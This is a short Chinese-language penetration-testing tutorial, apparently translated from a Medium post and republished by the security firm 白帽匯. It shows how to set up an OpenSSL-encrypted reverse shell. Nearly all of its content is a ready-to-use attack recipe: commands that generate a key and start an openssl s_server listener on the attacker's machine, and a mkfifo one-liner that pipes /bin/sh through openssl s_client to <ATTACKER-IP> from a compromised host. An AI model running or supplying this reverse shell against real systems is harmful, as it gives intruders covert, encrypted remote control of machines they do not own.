滲透測試時有很多方法可以獲得一個反彈shell,例如netcat、php、perl、.net、lolbins等等。但我最喜歡的方法之一利用是Openssl來獲得一個反彈shell。是的,就是那個幾乎每個https都要使用的庫,我們先用openssl來生成密鑰,最後再使用它來獲取一個反彈shell。

準備

首先我們需要在自己的機器上生成密鑰,這裡用kali來演示。

root@kali# openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

啟動監聽(滲透機器)

openssl s_server -quiet -key key.pem -cert cert.pem -port <PORT>

反彈shell(目標機器)

最後在目標機器,也就是你所攻破的機器,運行如下命令:

low-user@pwned#: mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <ATTACKER-IP>:<PORT> > /tmp/s; rm /tmp/s

本文由白帽彙整理並翻譯,不代表白帽匯任何觀點和立場

來源:利用OpenSSL搭建一個反彈shell|NOSEC安全訊息平臺 - NOSEC.ORG

原文:medium.com/@int0x33/day

白帽匯從事信息安全,專註於安全大數據、企業威脅情報。

公司產品:FOFA-網路空間安全搜索引擎、FOEYE-網路空間檢索系統、NOSEC-安全訊息平臺。

為您提供:網路空間測繪、企業資產收集、企業威脅情報、應急響應服務。

推薦閱讀:

相關文章